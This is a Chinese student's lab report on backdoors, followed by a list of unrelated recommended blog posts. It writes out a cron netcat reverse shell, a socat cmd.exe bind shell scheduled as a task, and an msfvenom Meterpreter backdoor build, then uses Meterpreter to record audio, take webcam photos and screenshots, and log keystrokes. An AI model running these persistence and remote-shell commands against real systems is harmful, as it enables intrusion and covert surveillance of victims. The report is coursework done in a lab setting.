20155227《网络对抗》Exp2 后门原理与实践

最新推荐文章于 2020-08-26 22:32:54 发布
最新推荐文章于 2020-08-26 22:32:54 发布
阅读量90 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/guyanlin/p/8654069.html
版权

20155227《网络对抗》Exp2 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 在非官方网站下载软件时,后门很可能被捆绑在软件中。

  • 攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • Linux下可以通过cron来启动
  • Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;

(3)Meterpreter有哪些给你映像深刻的功能?

  • 获取摄像头以及对靶机直接截屏,感觉很方便很厉害的样子

(4)如何发现自己有系统有没有被安装后门?

  • 用杀毒软件进行扫描。
  • 检查端口和进程。

实验准备(常用后门工具实践)

Windows获得Linux Shell

  • Windows下查看ip
    1065400-20180326213611175-1420735100.png

  • windows 打开监听
    1065400-20180326213625448-39701152.png

  • Linux反弹连接win
    1065400-20180326213658933-1650828015.png

  • windows下获得一个linux shell,可运行任何指令
    1065400-20180326213710409-1071024062.png

Linux获得Win Shell

  • Linux运行监听指令
    1065400-20180326213814406-105829786.png

  • Windows反弹连接Linux
    1065400-20180326213825161-1534079727.png

  • Linux下看到Windows的命令提示
    1065400-20180326213834322-100426028.png

nc传输数据

如图:
1065400-20180326213844545-263638880.png

实验内容及过程

1.使用netcat获取主机操作Shell,cron启动

  • Windows系统下,监听5227端口。
    1065400-20180326214105543-433420637.png

  • crontab -e指令编辑一条定时任务,在最后一行添加50 * * * * /bin/netcat 192.168.56.1 5227 -e /bin/sh

  • 时间到了之后获得了kalishell,可以输入指令。
    1065400-20180326214121162-1224520789.png

1065400-20180326214152458-806198896.png

2.使用socat获取主机操作Shell, 任务计划启动

  • Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
    1065400-20180326214330454-2028402627.png

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5227 exec:cmd.exe,pty,stderr
    1065400-20180326214346432-2013660787.png

  • 运行刚刚创建的任务:
    1065400-20180326214357871-1646255332.png

  • 在kali中输入指令socat - tcp:192.168.56.1:5227,此时可以发现已经成功获得了一个cmd shell
    1065400-20180326214408296-692080817.png

3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.115.128 LPORT=5227 -f exe > 20155227_backdoor.exe
    1065400-20180326214443767-1375099331.png

  • 将生成的后门程序复制到Windows主机上,也可以通过nc指令将生成的后门程序传送到Windows主机上

  • Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
    1065400-20180326214502105-884649379.png

  • 打开Windows上的后门程序

  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
    1065400-20180326214516711-162488132.png

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用help查看指令
    1065400-20180327111507412-1394252692.png

  • 使用record_mic指令截获一段音频:
    1065400-20180326214613583-2099798601.png

  • 使用webcam_snap指令使用摄像头进行拍照:
    1065400-20180326214626202-1733598021.png

1065400-20180328183400665-1817463964.jpg

  • 使用screenshot指令可以进行截屏:
    1065400-20180326214638422-1995341109.png
    1065400-20180326215352687-1764801880.jpg

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
    1065400-20180326214700007-2017207776.png

  • 使用getsystem指令进行提权,提权失败:
    1065400-20180326214714633-1696118176.png

实验过程中遇到的问题及解决

  • 问题:在设置payload过程中出现Handler failed to bind to XXX的错误。
    1065400-20180326220127905-1013553433.png

  • 解决:我在生成后门程序时不小心使用的是Windows的ip地址,改为kali的ip(相应的设置也改为kali的ip)之后问题解决。

实验体会

这次的实验非常有意思,使用MSF的时候,录音、截屏、照相、获取击键记录的实践让我在感到神奇的同时,也意识到我们的系统是很脆弱的。要保护好自己的隐私,就要提高安全意识。

转载于:https://www.cnblogs.com/guyanlin/p/8654069.html

相太阳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kibana We couldn't activate monitoring
weixin_30352191的博客
08-26 2348
调节一下监控状态查询的时间范围,有时候,刚启动监控,数据没有生成。把”last 1 hour“改成 具体有数据的时间 用如下语句查看,监控日志在不断生成。重启kibana后正常有监控画面了。 GET /.monitoring-es-6-*/_search { "size": 0, "query": { "term": { "type...
ELK入门——解决:Kibana的Stack Monitoring显示节点offline
Netceor的博客
02-03 3038
我的metricbeat运行正常,在dashboard中可以查看到相应数据,但是打开Stack monitoring,却发现节点全是offline,调了很多地方,所以只是给大家一个参考,调的过程中不确定有没有什么不太合适的地方,这些都完成后,刷新了几次页面就可以正常显示了。原本的错误场景大概如下图,这是别人博客里的,因为我已经正常了,所以没有截图。 一、配置kibana.yml 首先要参考的是官网给出的详细配置说明https://www.elastic.co/guide/en/kibana/cu.
[-] Handler failed to bind to x.x.x.x:port排错
1stPeak's Blog
02-18 1万+
报错: 原因: Kali的IP已经更换了,重新获取IP:ifconfig 如若还不行,重启msfconsole,再ifconfig,重新设置参数
怎么发现DLL后门,希望对大家有所帮助。
能力改变命运,心态决定一切!
04-13 1743
怎么发现DLL后门,希望对大家有所帮助。   1,安装好系统和所有的应用程序之后,备份system32目录下的EXE和DLL文件:打开CMD,来到WINNTsystem32目录下,执行:dir *.exe>exe.txt & dir *.dll>dll.txt,这样,就会把所有的EXE和DLL文件备份到exe.txt和dll.txt文件中;日后,如发现异常,可以使用相同的命令再次备份EXE和DLL
51nod 1179
weixin_30352191的博客
08-27 71
给出 $n$ 个数求最大的两两之间的 gcd统计每个数出现的次数枚举 $[1, Max]$如果存在 $2$ 个及以上的最大的数就是 $Answer$这里在枚举的时候倒序枚举每次判断见代码时间复杂度$\sum_{i = 1} ^ {n} \frac{n}{i}$即 $nlogn$ #include <iostream> #include <cstdio> #incl...
【Handler问题求指导】使用Handler遇到了问题
banqiechan7425的博客
01-01 591
package com.example.networktest; import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; import java.net.HttpURLConnection; import java.net.URL; import android.ap
1.6 JAVA高并发之线程池
diaoli1340的博客
07-19 233
一、JAVA高级并发   1.5JDK之后引入高级并发特性,大多数的特性在java.util.concurrent 包中,是专门用于多线程发编程的,充分利用了现代多处理器和多核心系统的功能以编写大规模并发应用程序。主要包含原子量、并发集合、同步器、可重入锁,并对线程池的构造提供了强力的支持。 二、线性池    2.1线程池的5中创建方式 1、Single Thread Exec...
在Kibana中进行监视的配置
一只洒鹿
08-09 1万+
在Kibana中配置监视 Configuring Monitoring in Kibana X-Pack监控使您可以深入了解弹性堆栈的操作。 有关更多信息,请参阅X-Pack监视和监视弹性堆栈。 监控Kibana:To monitor Kibana: 1.验证生产群集上的xpack.monitoring.collection.enabled设置是否为true。 如果该设置为false(默认值...
防御windows系统激活工具的后门入侵
崔凯洋的博客
08-26 1008
实验环境:win10 64位(虚拟机) 测试人:SAYC 背景:刚装完电脑windows系统,又或者是电脑店的装机师傅来家里安装系统 这个时候使用windows激活工具来激活其实是非常危险的,因为这个时候电脑没有任何的防御措施,双击运行程序可能就会在电脑中的某个地方植入病毒并隐藏,有些激活工具自身也会做免杀 我们来分析一款工具:如下图 我们其实并不清楚这款工具有没有植入后门,所以我选择不打开exe文件,用BBedit打开上图Keys.ini,如下图 很惊奇的发现了几个个英文单词,Pr
写一个简单的 Makefile
weixin_30352191的博客
01-06 87
参考来源:https://www.cnblogs.com/owlman/p/5514724.html 每次改动一个源代码文件以后,如果都要编译一次所有源代码,会浪费很多时间。Makefile 可以只编译更新过的源代码,节省时间。 比如:g++ main_solve.cpp qab.cpp -o Pandawarrior.x 可以写 Makefile, 内容为: Pandawarrior.x...
AQtime使用小记
gddsky的小空间
10-25 1475
今天刚到网上下了AQtime。因为有个通信及数据存储的程序出现的内存泄漏。在用户的环境里出现了两次,在测试的环境里一次也没有出现,开发人员猜测是一部分代码引起的。说要代码的覆盖测试。看看测试环境里有那些没有运行到。问有AQtime有没有和自动化工具一起用?在BBS里看到AQtime使用简介-覆盖率测试方法(转)AQtime对实际可执行的代码行(不包括注释、空行、函数头、#include语句、宏定义
利用MS17-010渗透win7(32位)
热门推荐
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
centos 6.9 安装docker
weixin_30352191的博客
08-14 583
1.查看系统具体版本 yum install lsb -y lsb_release -a 2.安装yum源 yum -y install http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm 3.安装docker yum install docker-io 安装失败: 已...
面试试题——基础篇
weixin_30352191的博客
07-26 114
1、面向对象的特征:继承、封装和多态   封装性就是把类(对象)的属性和行为结合成一个独立的相同单位,并尽可能隐蔽类(对象)的内部细节,对外形成一个边界,只保留有限的对外接口使之与外部发生联系。封装的特性使得类(对象)以外的部分不能随意存取类(对象)的内部数据(属性),保证了程序和数据不受外部干扰且不被误用。   继承具有单继承的特点,即只能继承自一个父类,每个子类只有一个直接父类,但是其父类...
Getting Started with xUnit.net (desktop)
weixin_34049032的博客
11-27 79
https://xunit.github.io/docs/getting-started-desktop.html In this article, we will demonstrate getting started with xUnit.net, showing you how to write and run your first set of unit tests. Write yo...
Kibana优化过程(Optimize)过长或无法结束的解决方案
点火三周的专栏
12-12 7892
使用过Kibana的同学应该都知道,当我们在kibana的配置文件中打开或者关闭功能,或者安装、卸载额外的插件后,重启kibana会触发一个优化的过程(optimize),如下图: 这个过程或长或短,视你电脑的性能而定。这里简单介绍一下该过程所要完成的事情。 Kibana是一个单页Web应用 首先,Kibana是一个单页的web应用。何为单页web应用?即所有的页面的读取都是在浏览器上完成,而与...
信息系统分析方法
weixin_30352191的博客
07-21 801
一、为业务分层 信息系统顾名思义就是管理数据的系统,而数据就是企业业务办理过程中产生的,所以信 息系统的建立必须围绕企业的业务展开。企业的业务数不胜数,如何来组织?答案就是: 根据业务的重要性,划分业务层次。一般情况下,四层就足够了,分别为:“A基本业务” (企业最核心的业务),“B重要业务”,“C一般业务”,“D延伸业务”。在分析企业业 务的过程中,只要业务按照ABCD的层次进行分类,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值